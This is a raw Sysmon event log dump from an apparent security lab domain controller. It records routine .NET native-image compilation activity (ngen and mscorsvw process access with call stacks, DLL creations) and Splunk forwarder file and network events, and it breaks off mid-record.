21:05:37.560{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A221-60D3-7804-00000000CF01}3680C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000021571Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:37.528{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D0EE1798EBEDBF7EA9F782A5F990164,SHA256=E0783BC314D130756FF9886EBE4E3A55320B167F991B0031D5C6B85BF541BB82,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021570Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:37.466{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A221-60D3-7704-00000000CF01}5548C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021569Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:37.450{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A221-60D3-7704-00000000CF01}5548C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021568Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:37.450{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A221-60D3-7704-00000000CF01}5548C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021567Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:37.356{4DB9351A-A220-60D3-7604-00000000CF01}4392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1128-0\System.Data.Services.Client.dll2021-06-23 21:05:37.356 23542300x800000000000000021585Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:38.950{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6E5646A3287DCC9C0B5CA3E88504A85A,SHA256=22E7418502D9C84B05DFD4979D0F9424B38C064AEA43D75F841BF4E31D1E3064,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000021584Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:37.146{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61440-false10.0.1.12-8000- 23542300x800000000000000021583Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:38.560{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C710D9BDA18847BB504BEDC230AD4C94,SHA256=838A66199B2863B3A863328C270161D77B071586DA5306C65057CBEC6613991C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021582Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:38.080{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A222-60D3-7A04-00000000CF01}2356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021581Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:38.044{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A222-60D3-7A04-00000000CF01}2356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021580Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:38.044{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A222-60D3-7A04-00000000CF01}2356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000021594Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:39.575{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89049BC2A7F9AC5CF3D6CC60B57BC0DA,SHA256=8F953276C5DF2F11D62BE5C436379B6B01CD45715E3B7AB8A226B36A3251175B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021593Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:39.513{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A223-60D3-7C04-00000000CF01}6296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021592Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:39.497{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A223-60D3-7C04-00000000CF01}6296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021591Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:39.497{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A223-60D3-7C04-00000000CF01}6296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021590Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:39.419{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A223-60D3-7B04-00000000CF01}5452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021589Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:39.403{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A223-60D3-7B04-00000000CF01}5452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021588Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:39.403{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A223-60D3-7B04-00000000CF01}5452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021587Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:39.263{4DB9351A-A222-60D3-7A04-00000000CF01}2356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\934-0\System.Data.SqlXml.dll2021-06-23 21:05:39.263 23542300x800000000000000021586Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:39.122{4DB9351A-9DEA-60D3-3000-00000000CF01}2404NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=CC494228D9B622F65865431EE32BBCD9,SHA256=4850E6D9F469EFAD53275876C967519322E99DE1F613F517E377B814E20689E0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021603Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:40.687{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A224-60D3-7E04-00000000CF01}6668C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021602Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:40.669{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A224-60D3-7E04-00000000CF01}6668C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021601Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:40.669{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A224-60D3-7E04-00000000CF01}6668C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000021600Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:40.606{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F347BB36F5CA0040852AD07670D8F48,SHA256=211A548E63DE8B69A365DDC53185F37AFAD78F36285272B68C8C794E007D9832,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021599Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:40.481{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A224-60D3-7D04-00000000CF01}1088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021598Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:40.466{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A224-60D3-7D04-00000000CF01}1088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021597Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:40.466{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A224-60D3-7D04-00000000CF01}1088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000021596Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:40.403{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 